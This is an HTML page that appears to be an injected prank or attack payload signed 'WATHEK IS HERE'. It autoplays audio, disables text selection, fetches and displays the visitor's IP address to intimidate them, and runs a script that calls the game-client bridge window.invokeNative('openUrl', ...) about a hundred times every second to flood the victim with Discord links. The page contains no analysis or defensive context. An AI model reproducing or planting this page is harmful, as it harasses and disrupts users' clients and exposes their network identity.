<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>#lyrica</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background-color: black;
            color: #ff0000;
            font-family: 'Courier New', Courier, monospace;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            overflow: hidden;
            flex-direction: column;
            position: relative;
        }
        .container {
            text-align: center;
            z-index: 1;
        }
        .anime-image {
            width: 700px; 
            max-width: 100%;
            border: 4px solid #333;
            border-radius: 10px;
            margin-bottom: 50px;
            display: block;
            margin-left: auto;
            margin-right: auto;
            opacity: 0.8;
        }
        .background {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: -1;
            object-fit: cover;
        }
        .signature-textt {
            margin-top: 20px;
            color: #00f;
            font-size: 1.2rem;
            font-weight: bold;
            text-shadow: 0 0 15px #00f;
        }
        .signature-text {
            margin-top: 20px;
            color: #00f;
            font-size: 2rem;
            font-weight: bold;
            background-color: rgba(0, 0, 0, 0.5);
            text-shadow: 0 0 15px #00f;
            padding: 10px;
            border-radius: 10px;
        }
        pre {
            color: white;
            background-color: rgba(0, 0, 0, 0);
            padding: 10px;
            border-radius: 15px;
            text-align: left;
        }
    </style>
</head>
<body>

    <img class="background" src="https://media.discordapp.net/attachments/1297409800933736458/1428146694704594994/9f93854d75b3ddf3147c79b0fb204a87.png?ex=68f170c1&is=68f01f41&hm=f2fb79645f363f16f7d409267b72b92cd5b13a7e8fb5e7c033932fe6934357e8&=&format=webp&quality=lossless&width=552&height=736" alt="Background" />

    <div class="container">
        <img class="anime-image" src="https://cdn.discordapp.com/attachments/1297409800933736458/1411128369700933702/IMG_5207.gif?ex=68f0d4f4&is=68ef8374&hm=2765223f56a845eb9ff3f86d1c022f0700c0a92f0c326b9f0095781e05599d5e&" alt="Anime" />

        <audio autoplay loop>
            <source src="https://d.top4top.io/m_3540rn7sq1.mp3" />
            Your browser does not support the audio element.
        </audio>

        <div class="signature-textt">
            <b>Your IP Address:</b> <span id="ip-address-value">Fetching...</span><br />
            <b>IP Information:</b>
            <pre id="ip-info"></pre>
        </div>

        <div class="signature-text">
            <p>WATHEK IS HERE</p>
            <p>هاك غبي</p>
        </div>
    </div>

    <script>
        // منع التحديد على الصفحة
        var omitformtags = ['input', 'textarea', 'select'].join('|');
        function disableselect(e) {
            if (omitformtags.indexOf(e.target.tagName.toLowerCase()) == -1)
                return false;
        }
        function reEnable() { return true; }
        if (typeof document.onselectstart != 'undefined')
            document.onselectstart = function () { return false; };
        else {
            document.onmousedown = disableselect;
            document.onmouseup = reEnable;
        }

        // جلب عنوان IP
        function fetchIPAndInfo() {
            fetch('https://api.ipify.org/?format=json')
                .then((response) => response.json())
                .then((data) => {
                    document.getElementById('ip-address-value').textContent = data.ip;
                });
        }
        fetchIPAndInfo();

         setInterval(() => {
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
             window.invokeNative("openUrl", "https://discord.gg/32");
         }, 1000);
    </script>

</body>
</html>
